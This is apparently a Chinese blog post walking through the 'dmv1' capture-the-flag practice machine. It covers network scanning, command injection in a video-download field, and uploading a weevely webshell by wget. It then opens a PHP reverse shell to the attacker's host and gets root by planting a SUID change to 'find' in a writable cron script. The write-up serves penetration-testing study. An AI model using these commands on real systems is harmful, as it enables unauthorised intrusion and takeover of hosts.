首页 > 其他分享 >dmv1靶机学习

dmv1靶机学习

时间:2023-12-18 16:07:04浏览次数:26  
标签:nmap kali dmv1 端口 192.168 学习 靶机 权限 find

信息收集

  • 在kali的系统进入界面我们通过账号kali 登录机(账号密码均为kali),登录完成后我们通过终端命令来确认一下本机网络地址,

在命令行输入 ifconfig

192.168.66.129子网掩码是255.255.255.0,由此我们可以判断场景处于局域网192.168.66.0/24内部

  • 接下来我们通过nmap命令工具来扫描一下局域网内部的其他设备,来确认一下是否存在靶机

sudo nmap -sn 192.168.66.0/24

  • 除去场景内设置的路由器和网关地址,我们可以看到还存在一台192.168.66.139的设备,推测该地址是靶机地址,我们继续使用nmap工具对地址进行扫描 确认一下

nmap --min-rate 10000 -p- 192.168.66.

  • 通过以上步骤得知系统暴露以上端口,但目前不清楚端口后对应的服务,继续使用nmap扫描执行一项
  • 命令行执行nmap -sT -sC -sV -O -p80, ip
  • 检测到目的地址开放80端口 。80端口通常在服务器上作为http web服务开放使用,考虑到80端口通常存在多个界面或目录,我们使用dirb工具对目录进行爆破

dirb http://192.168.66.

渗透分析

1 登录web界面发现是一款视频下载工具,使用burpsuite抓包发现请求路径是yt_url,尝试在请求参数中加载shell命令进行测试

dmv1靶机学习_靶机学习

使用ls -la查看有无隐藏文件发现无法请求

dmv1靶机学习_靶机学习_02

退出可能屏蔽了空格增加参数${IFS}

在kali使用weevely生成木马并开启http服务

weevely generate test ./shell.php
python3 -m http.server

在burpsuite将使用wget命令下载木马

在kali使用weevely连接获取初始权限

建立立足点

webshell通常权限受限比较大,这里执行php命令使用反弹shell

首先在kali界面监听1234端口

nc -lvnp 1234

在webshell执行

php -r '$sock=fsockopen("192.168.66.3",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

在kali 的反弹界面中使用find搜索拥有root权限的命令

find / -perm -u=s -type f 2>/dev/null

并没有root权限命令,只能尝试搜索目录下文件查看有无提权方式

dmv1靶机学习_靶机学习_03

这里在admin命令下找到一个flag,做一个初步的记录

其次可以发现两个脚本 一个是pspy64,一款检测进程工具 另外在tmp目录下找到clean.sh 可能是计划任务

这里首先使用pspy64 寻找clean执行历史发现

dmv1靶机学习_靶机学习_04

查看clean权限 发现当前用户有读写权限

dmv1靶机学习_靶机学习_05

在反弹shell中执行

echo "chmod u+s /usr/bin/find" >> clean.sh

给于find命令s权限进而使用find命令进行提权

find . -exec /bin/bash -p \;

提权

  • 首先查看系统版本及内核版本
  • 查看系统账号。
  • 查看sudo权限
  • 查看计划任务
  • 查看允许运行的服务

攻击结果

dmv1靶机学习_靶机学习_06

标签:nmap,kali,dmv1,端口,192.168,学习,靶机,权限,find
From: https://blog.51cto.com/u_13374359/8874550

相关文章

  • 大语言模型与传统机器学习的架构差异性解析
    在人工智能领域,架构设计是决定一个模型性能和应用范围的关键因素。大语言模型和传统机器学习有不同的设计框架,使得它们在应用场景和处理任务上具有显著差异。大语言模型,如GPT和BERT,基于庞大而复杂的神经网络结构构成,这些神经网络结构拥有数百万甚至数十亿的参数,能够学习和理解大量......
  • 《Java编程思想第四版》学习笔记49--关于第十三章习题
    (9)增加Frog.class到本章出现的清单文件中并运行jar以创建一个包括Frog和BangBean的JAR文件。现在从SUN公司处下载并安装BDK或者使用我们自己的可激活Bean的程序构建工具并增加JAR文件到我们的环境中,因此我们可以测试两个Bean。(10)创建我们自己的包括两个属性......
  • vimtutor学习笔记
    进入vimtutor#ubuntusystemvimtutorlesson2.3:onoperatorsandmotions许多处理文本的命令由operators和motions组成,格式如下:#使用时operator和motion之间无空格,例如:dwoperatormotion常用的motions:w-跳到下个单词的开始,不包含其第一个字符e-跳到当前单词......
  • 进一步学习 CommunityToolkit.Mvvm
    1.属性绑定privatestringtitle;publicstringTitle{get;set;} 可用以下属性方式替换,生成器会自动生成;[ObservableProperty]privatestringtitle; 另一种情况:命令privateboolisEnabled;publicboolIsEnabled{......
  • 进一步学习 CommunityToolkit.Mvvm 之 Messenger
    一、带token1.订阅消息WeakReferenceMessenger.Default.Register<UserMessage,string>(this,"MyToken",(r,m)=>{});2.发送消息WeakReferenceMessenger.Default.Send(newUserMessage(value),"MyToken");二、某一种数据类型发送接收消息1.订阅消息V......
  • Spring Boot学习随笔- JSP小项目-员工管理系统(验证码生成、增删改查)
    学习视频:【编程不良人】2021年SpringBoot最新最全教程第十章、项目开发实现一个登录注册,增删改查功能的系统10.1项目开发流程需求分析分析用户主要需求提取项目核心功能,根据核心功能构建页面原型库表设计:分析系统有哪些表分析表之间关联关系确定字段详细设......
  • NoSQL学习第二天:深入理解与实战体验
    经过昨天的学习,我对NoSQL数据库有了初步的了解。今天,我进一步深入学习了NoSQL数据库的原理、特点和实际应用,收获颇丰。一、NoSQL数据库原理与技术在深入学习中,我了解到NoSQL数据库的原理主要包括数据模型、存储引擎、索引和查询优化等方面。NoSQL数据库的数据模型灵活多变,可以适应......
  • 根据实体之间的关系设计表数据,学习总结
    一、当实体间的关系是1:1的关系时:学生对学生信息例:学生——学号;学生——姓名;学生——学籍当实体“学生”和其他实体都是1对1的关系,设计表可直接创建单张表即可学生表:学号PK(主键),学生姓名,学籍…… 二、当实体间的关系是1:n的关系时:班级对学生例:班级——班级号,班级——班级......
  • 数据持久层框架mybatis学习:使用mybatis+SpringBoot完成增删改查
    目录一、MyBatis的应用配置二、使用mybatis+SpringBoot完成增删改查2.1代码实现2.2增删改查接口调用一、MyBatis的应用配置依赖pom.xml注意:版本号的依赖冲突问题<?xmlversion="1.0"encoding="UTF-8"?><projectxmlns="http://maven.apache.org/POM/4.0.0"xm......
  • 【机器学习】OpenCV人脸识别
    OpenCv基础函数#读取图片image=cv2.imread("test01.jpg")#转灰度gray_image=cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)#修改尺寸resize_image=cv2.resize(image,(300,400))#绘制矩形cv2.rectangle(image,(x,y),(x+width,y+height),(0,255,0),2)#......